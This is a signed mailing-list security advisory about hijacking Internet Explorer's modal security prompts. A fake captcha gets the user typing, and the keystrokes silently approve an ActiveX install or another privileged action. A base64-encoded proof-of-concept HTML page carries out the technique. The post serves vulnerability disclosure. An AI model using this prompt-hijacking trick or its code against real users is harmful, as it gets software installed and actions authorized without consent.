This is a multi-part message in MIME format. --------------010404020600030408080408 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Dear Lists: Apparently I wasn't clear enough with this paragraph of my advisory, or a sizeable portion of the list readership elected to ignore it: "A malicious user could create content that would request the user to click an object or press a sequence of keys. By delivering a security prompt during this process, the site could subvert the prompting and obtain permission for actions that were not necessarily authorized." It seemed fairly clear to me, but apparently it sounded better to me than it did to some readers. :-( Basically, the scenario for the vulnerability is as follows: * Ask for user input that is predictable (mouse clicks, text string with the letter 'y', etc.) * Display a modal security prompt that will "eat" that input and treat it as a "Permit" answer to the security prompt. The result: compromise of security, potentially including arbitrary code execution. A particular scenario was identified that involved the exploitation of the modal ActiveX prompt delivered by some systems. The user is asked to type a certain string of characters (ala captcha). A prompt will be displayed (hopefully during the time the user is typing the string) to install the Microsoft Surround Video Control. If you're still typing the "captcha" when the prompt appears, you'll install the control. This works as advertised against all systems EXCEPT Windows XP SP2 and Windows Server 2003 SP1. If the software you install hoses your box, just remember that it's signed by Microsoft. In other words... don't look at me. Other prompts on XP SP2 and 2003 SP1 are exploitable for various gains as well. Virtually any prompt that wasn't commonly displayed on a web page prior to these updates is still handled via the (risky) modal dialog model. One example is the "Allow Paste Operations via Script" prompt that is displayed when a web page attempts to access the clipboard. Another example is "Initialize and Script ActiveX controls not marked as safe" prompt, which is somewhat mitigated by LMZ lockdown. All of those cases are exploitable in the same way as this one -- you simply have to change the "unsafe" action. Rather than having a page generate an ActiveX install, for instance, you could have it try to sniff the clipboard, initiate install-on-demand, or some other suspect action. The ability to cause the action to be approved silently is achieved the same way -- having a user unwittingly enter a 'Y' to the prompt. As you might notice, the exploit vector is virtually identical to that of MS05-054. I'm beginning to wonder if maybe it isn't the triviality of the remaining issues making them hard for people to envision. After all, Jesse Ruderman provides all of the theory and Secunia even demonstrates it for us with the file download dialog exploit code. The follow-up attack to such precise, detailed research is not a terribly creative one -- it merely involves piecing together what somebody else missed, ignored or didn't research to its full depth. This is a really easy class of attack to eliminate completely when compared to other more insidious attack vectors, and I expect that this process will eventually happen. Note that the standard disclaimer (that your use of this is at your own risk) still applies. Perhaps more so this time, because there's Microsoft code coming down along with the exploit. Not to say that my code is less buggy than Microsoft's (at least, not if I wrote a few billion lines of it) rather that it's third-party software and may be subject to unforeseen security risks, incompatibilities or other maladies (ala COM Object Instantiation or MS06-015). - -- "Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: iD8DBQFEULsifp4vUrVETTgRA+22AKCl1mkmE5EVB2R+Nv+H64VynQccmQCcCPMx oGy6Mz4Lcoj7ZyPhQ+LEB2I= =+LbS -----END PGP SIGNATURE----- --------------010404020600030408080408 Content-Type: text/html; name="ietest.html" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="ietest.html" PEhUTUw+DQo8SEVBRD4NCjxUSVRMRT5JbnRlcm5ldCBFeHBsb3JlciBBY3RpdmVYIEluc3Rh bGxhdGlvbiBWdWxuZXJhYmlsaXR5PC9USVRMRT4NCjwvSEVBRD4NCjxCT0RZIEJHQ09MT1I9 IiNGRkZGRkYiIFRFWFQ9IiMwMDAwMDAiPg0KPFNDUklQVD4NCg0KZnVuY3Rpb24gZG9JbnN0 YWxsQ29udHJvbCgpIHsNCg0KCWRvY3VtZW50LmJvZHkuaW5uZXJIVE1MICs9DQoJCSI8T0JK RUNUIENMQVNTSUQ9XCJjbHNpZDo5Mjg2MjZBMy02Qjk4LTExQ0YtOTBCNC0wMEFBMDBBNDAx MUZcIiBUWVBFPVwiYXBwbGljYXRpb24veC1vbGVvYmplY3RcIiBDT0RFQkFTRT1cImh0dHA6 Ly9hY3RpdmV4Lm1pY3Jvc29mdC5jb20vYWN0aXZleC9jb250cm9scy9tdXNldW0vTVNTdXJW aWQuY2FiI1ZlcnNpb249MSwyLDAsN1wiIFdJRFRIPVwiMzI1XCIgSEVJR0hUPVwiMjUwXCI+ XHJcbiIgKw0KICAgICAgICAgICAgCSI8UEFSQU0gTkFNRT1cIlN1cnJvdW5kUmVjdFwiIFZB TFVFPVwiMCwwLDMyNSwyNTBcIj5cclxuIiArDQogICAgICAgICAgICAJIjxQQVJBTSBOQU1F PVwiSW1hZ2VcIiBWQUxVRT1cInJpdGV0cmVlLmpwZ1wiPlxyXG4iICsNCiAgICAgICAgICAJ IjwvT0JKRUNUPiI7DQoNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY2FwdGNoYSIpLmZv Y3VzKCk7DQp9DQoNCmZ1bmN0aW9uIGRvV2FpdEVudHJ5KCkgew0KDQoJaWYgKGV2ZW50Lmtl eUNvZGUgPT0gNzggfHwgZXZlbnQua2V5Q29kZSA9PSAxMTApIHsNCgkJZG9JbnN0YWxsQ29u dHJvbCgpOw0KCX0NCg0KfQ0KDQo8L1NDUklQVD4NCg0KPEZPUk0gQUNUSU9OPSIiIE1FVEhP RD0iR0VUIj4NClBsZWFzZSBlbnRlciB0aGUgdGV4dCB5b3Ugc2VlIG9uIHRoZSBsZWZ0OjxC Uj48QlI+DQoNCjxCPm9uM2wxeTZ5OHk1eTwvQj4gPElOUFVUIFRZUEU9InRleHQiIElEPSJj YXB0Y2hhIiBPTktFWVBSRVNTPSJkb1dhaXRFbnRyeSgpIj4NCjwvRk9STT4NCg0KPC9CT0RZ Pg0KPC9IVE1MPg== --------------010404020600030408080408 Content-Type: text/plain; name="ietest.html.asc" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="ietest.html.asc" LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NClZlcnNpb246IEdudVBHIHYxLjQuMiAo TWluZ1czMikNCg0KaUQ4REJRQkVVTENvZnA0dlVyVkVUVGdSQWkvU0FLQ2liZnpVZFJaSWJ6 QXgrUzlNU1BUbWdYbXk2QUNlTlNTdg0KUTUwYzU1VEplTlhWck5nUlhLaHZ2N2M9DQo9ZUoz MA0KLS0tLS1FTkQgUEdQIFNJR05BVFVSRS0tLS0tDQo= --------------010404020600030408080408--